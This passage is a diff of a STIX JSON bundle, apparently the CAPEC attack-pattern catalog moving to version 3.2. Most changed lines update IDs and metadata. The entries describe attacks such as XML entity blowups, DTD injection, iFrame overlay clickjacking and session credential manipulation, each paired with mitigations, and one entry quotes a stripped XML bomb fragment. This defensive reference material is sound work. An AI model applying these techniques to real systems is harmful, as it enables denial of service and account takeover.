"course-of-action--1ff0abaa-928a-4d25-b8b7-d6c3da83263f" + "id": "course-of-action--91237e5f-d950-4f1d-8d7b-69014cc9cb04" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a27d6b23-9ed1-423a-8bcc-c2a11fd6f329", - "source_ref": "course-of-action--1ff0abaa-928a-4d25-b8b7-d6c3da83263f", + "id": "relationship--c7b26389-c529-4d2b-ad7b-e74fc65699db", + "source_ref": "course-of-action--91237e5f-d950-4f1d-8d7b-69014cc9cb04", "relationship_type": "mitigates", - "target_ref": "attack-pattern--be014d69-3d57-4c22-b2a1-a053dead702d" + "target_ref": "attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--852fdfa5-cc8f-4edd-8389-f574e3d2eee5", - "source_ref": "course-of-action--973c207c-2784-4f0c-98e8-0ac062857549", + "id": "relationship--b914cf9d-94aa-417c-88b4-819c3934159f", + "source_ref": "course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c", "relationship_type": "mitigates", - "target_ref": "attack-pattern--be014d69-3d57-4c22-b2a1-a053dead702d" + "target_ref": "attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7" }, { "name": "Client-Server Protocol Manipulation", "description": "An adversary takes advantage of weaknesses in the protocol by which a client and server are communicating to perform unexpected actions. Communication protocols are necessary to transfer messages between client and server applications. Moreover, different protocols may be used for different types of interactions. For example, an authentication protocol might be used to establish the identities of the server and client while a separate messaging protocol might be used to exchange data. If there is a weakness in a protocol used by the client and server, an attacker might take advantage of this to perform various types of attacks. For example, if the attacker is able to manipulate an authentication protocol, the attacker may be able spoof other clients or servers. If the attacker is able to manipulate a messaging protocol, the may be able to read sensitive information or modify message contents. This attack is often made easier by the fact that many clients and servers support multiple protocols to perform similar roles. For example, a server might support several different authentication protocols in order to support a wide range of clients, including legacy clients. Some of the older protocols may have vulnerabilities that allow an attacker to manipulate client-server interactions.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", @@ -12556,15 +12685,16 @@ ], "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--b68af27f-43f5-45be-a2c6-a276b2106841" + "id": "attack-pattern--638c5a6e-24a2-4142-b597-1031aa139b90" }, { "name": "XML External Entities Blowup", "description": "This attack takes advantage of the entity replacement property of XML where the value of the replacement is a URI. A well-crafted XML document could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -12588,43 +12718,44 @@ "\n In this example, the XML parser parses the attacker's XML and opens the malicious URI where the attacker controls the server and writes a massive amount of data to the response stream. In this example the malicious URI is a large file transfer.\n < !DOCTYPE bomb []>&detonate;\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--36c22d2c-dbfd-4bbd-8237-dc0f63949ed6" + "id": "attack-pattern--631027cc-a80a-4768-a4ae-ea7a7484acbd" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-221-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "This attack may be mitigated by tweaking the XML parser to not resolve external entities. If external entities are needed, then implement a custom XmlResolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally.", "type": "course-of-action", - "id": "course-of-action--697e60b7-d3f6-4e04-ab89-d912cf5698a6" + "id": "course-of-action--7766bca9-c0e5-45bf-9e34-c8b1d3df00a1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d6116da8-8316-447a-8e87-bb4b1546f37b", - "source_ref": "course-of-action--697e60b7-d3f6-4e04-ab89-d912cf5698a6", + "id": "relationship--57a612fe-f3fe-4b44-969d-e8caed9ffb73", + "source_ref": "course-of-action--7766bca9-c0e5-45bf-9e34-c8b1d3df00a1", "relationship_type": "mitigates", - "target_ref": "attack-pattern--36c22d2c-dbfd-4bbd-8237-dc0f63949ed6" + "target_ref": "attack-pattern--631027cc-a80a-4768-a4ae-ea7a7484acbd" }, { "name": "iFrame Overlay", "description": "In an iFrame overlay attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from seemingly completely different system. While being logged in to some target system, the victim visits the attackers' malicious site which displays a UI that the victim wishes to interact with. In reality, the iFrame overlay page has a transparent layer above the visible UI with action controls that the attacker wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the attacker may have just tricked the victim into executing some potentially privileged (and most undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks he or she is clicking on versus what he or she is actually clicking on.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -12690,90 +12821,91 @@ "The following example is a real-world iFrame overlay attack [2]. In this attack, the malicious page embeds Twitter.com on a transparent IFRAME. The status-message field is initialized with the URL of the malicious page itself. To provoke the click, which is necessary to publish the entry, the malicious page displays a button labeled \"Don't Click.\" This button is aligned with the invisible \"Update\" button of Twitter. Once the user performs the click, the status message (i.e., a link to the malicious page itself) is posted to his/ her Twitter profile." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--04826742-d8b2-413d-9ffc-7e23e342477e" + "id": "attack-pattern--2d50280d-8c0c-46e3-9397-c46d577cff93" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-222-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Configuration: Disable iFrames in the Web browser.", "type": "course-of-action", - "id": "course-of-action--12fefdce-c946-4fcb-be99-4221611eeddf" + "id": "course-of-action--7195cb36-22ea-4d06-93e2-5ce46840220b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--5e404dae-767b-4542-a773-784164674dc2", - "source_ref": "course-of-action--12fefdce-c946-4fcb-be99-4221611eeddf", + "id": "relationship--28956a76-3892-41c8-90e0-d027d1d65c4f", + "source_ref": "course-of-action--7195cb36-22ea-4d06-93e2-5ce46840220b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--04826742-d8b2-413d-9ffc-7e23e342477e" + "target_ref": "attack-pattern--2d50280d-8c0c-46e3-9397-c46d577cff93" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-222-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Operation: When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.", "type": "course-of-action", - "id": "course-of-action--2b18c7dc-e84d-4710-9774-755e1755bbe1" + "id": "course-of-action--96c9c32d-5858-486a-8cca-dadc3bca4adc" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e41383ca-85f1-467a-9e26-01e11ae512c8", - "source_ref": "course-of-action--2b18c7dc-e84d-4710-9774-755e1755bbe1", + "id": "relationship--0c11c0e0-9843-4467-b588-8275b71b6be1", + "source_ref": "course-of-action--96c9c32d-5858-486a-8cca-dadc3bca4adc", "relationship_type": "mitigates", - "target_ref": "attack-pattern--04826742-d8b2-413d-9ffc-7e23e342477e" + "target_ref": "attack-pattern--2d50280d-8c0c-46e3-9397-c46d577cff93" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-222-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Operation: If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.", "type": "course-of-action", - "id": "course-of-action--aceceabd-d389-4adb-aa15-47d411467d5f" + "id": "course-of-action--e771e07e-01bf-4984-b3e0-fab66906ffdb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--49c5b411-7e54-4df4-aba4-5bfab59eb289", - "source_ref": "course-of-action--aceceabd-d389-4adb-aa15-47d411467d5f", + "id": "relationship--18006d48-8c85-41bc-a8c7-5b349247540c", + "source_ref": "course-of-action--e771e07e-01bf-4984-b3e0-fab66906ffdb", "relationship_type": "mitigates", - "target_ref": "attack-pattern--04826742-d8b2-413d-9ffc-7e23e342477e" + "target_ref": "attack-pattern--2d50280d-8c0c-46e3-9397-c46d577cff93" }, { "name": "Fingerprinting", "description": "An adversary compares output from a target system to known indicators that uniquely identify specific details about the target. Fingerprinting by itself is not usually detrimental to the target. However, the information gathered through fingerprinting often enables an adversary to discover existing weaknesses in the target.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -12807,40 +12939,41 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--132180a9-c7c6-424c-8795-1252e7094799" + "id": "attack-pattern--a6ec69a5-b1df-412a-bae3-24edc5ff713c" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-224-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "While some information is shared by systems automatically based on standards and protocols, remove potentially sensitive information that is not necessary for the application's functionality as much as possible.", "type": "course-of-action", - "id": "course-of-action--0aed7fa0-60ec-44d5-8cd6-127cdbc76811" + "id": "course-of-action--4d66c05f-25c0-4ae2-96db-b955fdde0af0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--6db4eea9-eb9b-4ac8-be34-7c32684175e3", - "source_ref": "course-of-action--0aed7fa0-60ec-44d5-8cd6-127cdbc76811", + "id": "relationship--845db3a7-86b4-4ea8-a02e-59dcfef32685", + "source_ref": "course-of-action--4d66c05f-25c0-4ae2-96db-b955fdde0af0", "relationship_type": "mitigates", - "target_ref": "attack-pattern--132180a9-c7c6-424c-8795-1252e7094799" + "target_ref": "attack-pattern--a6ec69a5-b1df-412a-bae3-24edc5ff713c" }, { "name": "Session Credential Falsification through Manipulation", "description": "An attacker manipulates an existing credential in order to gain access to a target application. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. An attacker may be able to manipulate a credential sniffed from an existing connection in order to gain access to a target server. For example, a credential in the form of a web cookie might have a field that indicates the access rights of a user. By manually tweaking this cookie, a user might be able to increase their access rights to the server. Alternately an attacker may be able to manipulate an existing credential to appear as a different user. This attack differs from falsification through prediction in that the user bases their modified credentials off existing credentials instead of using patterns detected in prior credentials to create a new credential that is accepted because it fits the pattern. As a result, an attacker may be able to impersonate other users or elevate their permissions to a targeted service.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -12870,15 +13003,16 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--b329cfe6-ce79-4181-bcc0-f2b750d47fbb" + "id": "attack-pattern--9fd50026-2e98-4d6e-9805-e1ed3f71f7f8" }, { "name": "Sustained Client Engagement", "description": "An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource. The degree to which the attack is successful depends upon the adversary's ability to sustain resource requests over time with a volume that exceeds the normal usage by legitimate users, as well as other mitigating circumstances such as the target's ability to shift load or acquire additional resources to deal with the depletion. This attack differs from a flooding attack as it is not entirely dependent upon large volumes of requests, and it differs from resource leak exposures which tend to exploit the surrounding environment needed for the resource to function. The key factor in a sustainment attack are the repeated requests that take longer to process than usual.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", @@ -12897,40 +13031,41 @@ ], "x_capec_abstraction": "Meta", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--7a9f9cf5-f585-4ffd-a829-555c97e059e4" + "id": "attack-pattern--7a84ee4e-66e0-435f-bbcc-0eeb394a16b6" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "name": "coa-227-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Potential mitigations include requiring a unique login for each resource request, constraining local unprivileged access by disallowing simultaneous engagements of the resource, or limiting access to the resource to one access per IP address. In such scenarios, the adversary would have to increase engagements either by launching multiple sessions manually or programmatically to counter such defenses.", "type": "course-of-action", - "id": "course-of-action--c4d8ec74-21f7-4f5e-bb5b-9db35f4e2585" + "id": "course-of-action--5db3f6ef-aad5-4b2f-90fc-db232791760b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--aae3d5cb-2916-4ae3-ab9e-44e4166a3e6a", - "source_ref": "course-of-action--c4d8ec74-21f7-4f5e-bb5b-9db35f4e2585", + "id": "relationship--ce8b0873-e9de-4fc3-9331-a5fc5bdf683e", + "source_ref": "course-of-action--5db3f6ef-aad5-4b2f-90fc-db232791760b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--7a9f9cf5-f585-4ffd-a829-555c97e059e4" + "target_ref": "attack-pattern--7a84ee4e-66e0-435f-bbcc-0eeb394a16b6" }, { "name": "DTD Injection", "description": "An attacker injects malicious content into an application's DTD in an attempt to produce a negative technical impact. DTDs are used to describe how XML documents are processed. Certain malformed DTDs (for example, those with excessive entity expansion as described in CAPEC 197) can cause the XML parsers that process the DTDs to consume excessive resources resulting in resource depletion.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -12958,90 +13093,91 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--957dfb5c-7ff6-400e-8a3e-9013d55ef2bf" + "id": "attack-pattern--f92e04ee-37d8-45fb-a412-691530f2ed85" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-228-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Sanitize incoming DTDs to prevent excessive expansion or other actions that could result in impacts like resource depletion.", "type": "course-of-action", - "id": "course-of-action--eb55f0a8-bef0-4929-92e8-bd4970c86286" + "id": "course-of-action--9cb81a1b-569e-4088-93ff-5eedab574283" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d72fd5cb-ead8-4cd5-9f7f-5633e873efe4", - "source_ref": "course-of-action--eb55f0a8-bef0-4929-92e8-bd4970c86286", + "id": "relationship--66225a03-9adb-4232-b7ac-bcad772bc785", + "source_ref": "course-of-action--9cb81a1b-569e-4088-93ff-5eedab574283", "relationship_type": "mitigates", - "target_ref": "attack-pattern--957dfb5c-7ff6-400e-8a3e-9013d55ef2bf" + "target_ref": "attack-pattern--f92e04ee-37d8-45fb-a412-691530f2ed85" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-228-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Disallow the inclusion of DTDs as part of incoming messages.", "type": "course-of-action", - "id": "course-of-action--893413f3-3e42-445f-bb53-d27f896a8812" + "id": "course-of-action--e04fa978-708c-4f71-8057-c7f3a317801e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--ed416fff-8882-4633-a7bf-b07b563bab4d", - "source_ref": "course-of-action--893413f3-3e42-445f-bb53-d27f896a8812", + "id": "relationship--7258ef0d-8a86-483a-b45f-0cfeaed3cd88", + "source_ref": "course-of-action--e04fa978-708c-4f71-8057-c7f3a317801e", "relationship_type": "mitigates", - "target_ref": "attack-pattern--957dfb5c-7ff6-400e-8a3e-9013d55ef2bf" + "target_ref": "attack-pattern--f92e04ee-37d8-45fb-a412-691530f2ed85" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-228-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Use XML parsing tools that protect against DTD attacks.", "type": "course-of-action", - "id": "course-of-action--71a2e216-a184-4e0b-b652-89e98801047d" + "id": "course-of-action--7e686f40-c86b-4881-9137-c67559d032a0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--bfa35fc1-5f9f-498a-b76d-f77a46ad03de", - "source_ref": "course-of-action--71a2e216-a184-4e0b-b652-89e98801047d", + "id": "relationship--51eb4e97-a357-48a1-b4d5-8bfd55a3ece8", + "source_ref": "course-of-action--7e686f40-c86b-4881-9137-c67559d032a0", "relationship_type": "mitigates", - "target_ref": "attack-pattern--957dfb5c-7ff6-400e-8a3e-9013d55ef2bf" + "target_ref": "attack-pattern--f92e04ee-37d8-45fb-a412-691530f2ed85" }, { "name": "XML Attribute Blowup", "description": "This attack exploits certain XML parsers which manage data in an inefficient manner. The attacker crafts an XML document with many attributes in the same XML node. In a vulnerable parser, this results in a denial of service condition owhere CPU resources are exhausted because of the parsing algorithm.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -13067,40 +13203,41 @@ "\n In this example, assume that the victim is running a vulnerable parser such as .NET framework 1.0. This results in a quadratic runtime of O(n^2).\n \n A document with n attributes results in (n^2)/2 operations to be performed. If an operation takes 100 nanoseconds then a document with 100,000 operations would take 500s to process. In this fashion a small message of less than 1MB causes a denial of service condition on the CPU resources.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--00b72f35-762d-4e97-bd54-21a223bb16b9" + "id": "attack-pattern--eca65a23-cc6f-4bd9-ba21-e64510a66038" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-229-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "This attack may be mitigated completely by using a parser that is not using a vulnerable container. Mitigation may also limit the number of attributes per XML element.", "type": "course-of-action", - "id": "course-of-action--ce19f977-522a-4be1-b7e8-b121c7894b3a" + "id": "course-of-action--181e9016-6187-47ba-aa85-ff726a951dae" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--5d9c479e-35ed-4a12-a932-1d60aaff5683", - "source_ref": "course-of-action--ce19f977-522a-4be1-b7e8-b121c7894b3a", + "id": "relationship--1e183c89-a8ef-4363-ad68-714b5e204618", + "source_ref": "course-of-action--181e9016-6187-47ba-aa85-ff726a951dae", "relationship_type": "mitigates", - "target_ref": "attack-pattern--00b72f35-762d-4e97-bd54-21a223bb16b9" + "target_ref": "attack-pattern--eca65a23-cc6f-4bd9-ba21-e64510a66038" }, { "name": "File Content Injection", "description": "An attack of this type exploits the host's trust in executing remote content, including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the adversary and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The adversary exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the adversary knows the standard handling routines and can identify vulnerabilities and entry points, they can be exploited by otherwise seemingly normal content. Once the attack is executed, the adversary's program can access relative directories such as C:\\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + 